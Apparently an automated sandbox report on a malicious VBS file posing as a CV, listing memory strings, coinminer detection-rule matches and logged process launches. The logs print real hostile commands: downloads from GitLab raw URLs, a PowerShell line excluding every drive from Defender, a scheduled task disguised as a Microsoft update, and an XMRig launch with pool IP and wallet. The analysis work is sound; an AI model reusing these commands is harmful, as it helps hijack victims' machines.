Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.13.dr | String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0 |
Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.13.dr | String found in binary or memory: http://crl.globalsign.net/Root.crl0 |
Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.13.dr | String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0 |
Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.13.dr | String found in binary or memory: http://crl.globalsign.net/primobject.crl0 |
Source: wscript.exe, 00000005.00000003.678726662.00000252701E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.726396843.00000252701FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.725381100.00000252701E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.723244179.00000252701E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.725940545.00000252701F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.728634785.0000025270200000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: wscript.exe, 00000005.00000003.678726662.000002527022E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro6 |
Source: wscript.exe, 00000011.00000003.726386385.0000024C2F6E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.726313946.0000024C2F6D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.726543417.0000024C2F6FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.microsoft.c |
Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000D.00000003.681306883.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, ps.exe.13.dr | String found in binary or memory: http://www.nirsoft.net/ |
Source: wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com |
Source: wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://content-cloudbilling.googleapis.com |
Source: wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://content-cloudresourcemanager.googleapis.com |
Source: wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://content-compute.googleapis.com |
Source: wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://content.googleapis.com |
Source: wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://customers.gitlab.com |
Source: wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com |
Source: wscript.exe, 00000005.00000003.678726662.00000252701E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.726396843.00000252701FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.725381100.00000252701E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.723244179.00000252701E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.725940545.00000252701F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.728634785.0000025270200000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/ |
Source: wscript.exe, 00000005.00000002.728824562.0000025272950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.724831666.00000252704B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/-/sandbox/ |
Source: wscript.exe, 00000005.00000002.728824562.0000025272950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.724831666.00000252704B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/-/speedscope/index.html |
Source: wscript.exe, 00000005.00000003.678726662.00000252701E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/7 |
Source: wscript.exe, 00000005.00000002.728824562.0000025272950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.724831666.00000252704B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/admin/ |
Source: wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/assets/ |
Source: wscript.exe, 00000005.00000003.344943313.000002526FF09000.00000004.00000020.00020000.00000000.sdmp, curriculum_vitae-copie_(1).vbs | String found in binary or memory: https://gitlab.com/cv1811930/cv/-/raw/main/gmail.7z?inline=false |
Source: wscript.exe, 00000000.00000003.348852456.0000026D0B921000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/cv1811930/cv/-/raw/main/gmail.7z?inline=false5 |
Source: wscript.exe, 00000005.00000003.678726662.000002527022E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/cv1811930/cv/-/raw/main/gmail.7z?inline=falser |
Source: wscript.exe, 00000019.00000002.754502079.0000025057FEA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/cv6535510/cv/-/raw/m |
Source: wscript.exe, 00000019.00000002.754508592.0000025057FED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb |
Source: wscript.exe, 0000001D.00000002.821669261.000001CE40AF7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001D.00000002.821647912.000001CE3F285000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001D.00000002.821620533.000001CE3F11D000.00000004.00000020.00020000.00000000.sdmp, sarmat.vbs.13.dr | String found in binary or memory: https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=false |
Source: wscript.exe, 00000019.00000003.753938394.0000025057FD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.754010637.0000025057FE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.753878427.0000025057FD9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=false-48AA-1 |
Source: wscript.exe, 00000019.00000003.754146201.0000025057FE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000002.754508592.0000025057FED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.754250011.0000025057FEC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=false-48AA-1&&T |
Source: wscript.exe, 00000019.00000002.754546393.00000250582A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000002.771953581.0000026FFEA15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001D.00000002.821647912.000001CE3F285000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=falsee |
Source: wscript.exe, 00000005.00000002.728550362.00000252701BE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.725381100.000002527019F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.723244179.000002527019F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.726622211.00000252701BD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com |
Source: wscript.exe, 00000005.00000002.728824562.0000025272950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.724831666.00000252704B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://new-sentry.gitlab.net |
Source: wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_env |
Source: wscript.exe, 00000005.00000002.728824562.0000025272950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.724831666.00000252704B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sentry.gitlab.net |
Source: wscript.exe, 00000005.00000002.728824562.0000025272950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.724831666.00000252704B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://snowplow.trx.gitlab.net |
Source: wscript.exe, 00000005.00000002.728824562.0000025272950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.724831666.00000252704B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sourcegraph.com |
Source: wscript.exe, 00000005.00000002.727305157.000002526E1B0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.7-zip.org/ |
Source: wscript.exe, 00000005.00000003.344943313.000002526FF09000.00000004.00000020.00020000.00000000.sdmp, curriculum_vitae-copie_(1).vbs | String found in binary or memory: https://www.7-zip.org/a/7zr.exe |
Source: wscript.exe, 00000005.00000002.728510558.000002527019F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.725381100.000002527019F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678726662.000002527019C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.723244179.000002527019F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.7-zip.org/a/7zr.exe= |
Source: wscript.exe, 00000005.00000002.728323335.000002527005B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.723130778.000002527005B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.726527500.000002527005B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.7-zip.org/a/7zr.exeA |
Source: wscript.exe, 00000005.00000002.728510558.000002527019F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.725381100.000002527019F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678726662.000002527019C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.723244179.000002527019F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.7-zip.org/a/7zr.exeS |
Source: wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/ |
Source: wscript.exe, 00000005.00000002.728824562.0000025272950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.724831666.00000252704B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com/ns.html |
Source: wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/recaptcha/ |
Source: wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.recaptcha.net/ |
Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000015.00000000.731187915.00007FF6C5392000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.13.dr | String found in binary or memory: https://xmrig.com/docs/algorithms |
Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000015.00000000.731187915.00007FF6C5392000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.13.dr | String found in binary or memory: https://xmrig.com/wizard |
Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000015.00000000.731187915.00007FF6C5392000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.13.dr | String found in binary or memory: https://xmrig.com/wizard%s |
Source: 13.3.7g.exe.2f80000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen |
Source: 13.3.7g.exe.2f80000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth |
Source: 13.3.7g.exe.2fb7600.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen |
Source: 13.3.7g.exe.2fb7600.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth |
Source: 21.0.mservice.exe.7ff6c5050000.0.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen |
Source: 21.0.mservice.exe.7ff6c5050000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth |
Source: 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects coinmining malware Author: ditekSHen |
Source: 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth |
Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPED | Matched rule: Detects coinmining malware Author: ditekSHen |
Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPED | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo | |
Source: unknown | Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo | |
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo | |
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo | |
Source: unknown | Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l: | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:" | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l: | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:" | Jump to behavior |
Source: 13.3.7g.exe.2f80000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware |
Source: 13.3.7g.exe.2f80000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/ |
Source: 13.3.7g.exe.2fb7600.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware |
Source: 13.3.7g.exe.2fb7600.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/ |
Source: 21.0.mservice.exe.7ff6c5050000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware |
Source: 21.0.mservice.exe.7ff6c5050000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/ |
Source: 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware |
Source: 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/ |
Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPED | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware |
Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPED | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/ |
Source: C:\Users\Public\7g.exe | Code function: 13_2_00B53FD5 | 13_2_00B53FD5 |
Source: C:\Users\Public\7g.exe | Code function: 13_2_00B781E0 | 13_2_00B781E0 |
Source: C:\Users\Public\7g.exe | Code function: 13_2_00B741C8 | 13_2_00B741C8 |
Source: C:\Users\Public\7g.exe | Code function: 13_2_00B7C360 | 13_2_00B7C360 |
Source: C:\Users\Public\7g.exe | Code function: 13_2_00B6C350 | 13_2_00B6C350 |
Source: C:\Users\Public\7g.exe | Code function: 13_2_00B6C4B0 | 13_2_00B6C4B0 |
Source: C:\Users\Public\7g.exe | Code function: 13_2_00B8253A | 13_2_00B8253A |
Source: C:\Users\Public\7g.exe | Code function: 13_2_00B28519 | 13_2_00B28519 |
Source: C:\Users\Public\7g.exe | Code function: 13_2_00B3E6A7 | 13_2_00B3E6A7 |
Source: C:\Users\Public\7g.exe | Code function: 13_2_00B82621 | 13_2_00B82621 |
Source: C:\Users\Public\7g.exe | Code function: 13_2_00B5C88D | 13_2_00B5C88D |
Source: C:\Users\Public\7g.exe | Code function: 13_2_00B2A87C | 13_2_00B2A87C |
Source: C:\Users\Public\7g.exe | Code function: 13_2_00B6A9C0 | 13_2_00B6A9C0 |
Source: C:\Users\Public\7g.exe | Code function: 13_2_00B7E960 | 13_2_00B7E960 |
Source: C:\Users\Public\7g.exe | Code function: 13_2_00B66A00 | 13_2_00B66A00 |
Source: C:\Users\Public\7g.exe | Code function: 13_2_00B2AA45 | 13_2_00B2AA45 |
Source: C:\Users\Public\7g.exe | Code function: 13_2_00B7EB39 | 13_2_00B7EB39 |
Source: C:\Users\Public\7g.exe | Code function: 13_2_00B74B00 | 13_2_00B74B00 |
Source: C:\Users\Public\7g.exe | Code function: 13_2_00B2CDBD | 13_2_00B2CDBD |
Source: C:\Users\Public\7g.exe | Code function: 13_2_00B70D89 | 13_2_00B70D89 |
Source: C:\Users\Public\7g.exe | Code function: 13_2_00B74E20 | 13_2_00B74E20 |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\curriculum_vitae-copie_(1).vbs" | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\curriculum_vitae-copie_(1).vbs | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l: | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:" | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\Public\7g.exe C:\Users\Public\7g.exe" e -p1625092 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\gmail.7z | |
Source: C:\Users\Public\7g.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml" | |
Source: unknown | Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\Public\WindowsUpdate\mservice.exe "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu -p 0308-18h00m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title | |
Source: C:\Users\Public\WindowsUpdate\mservice.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo | |
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo | |
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo | |
Source: unknown | Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l: | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\Public\7g.exe C:\Users\Public\7g.exe" e -p1625092 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\gmail.7z | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml" | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\Public\WindowsUpdate\mservice.exe "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu -p 0308-18h00m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo | |
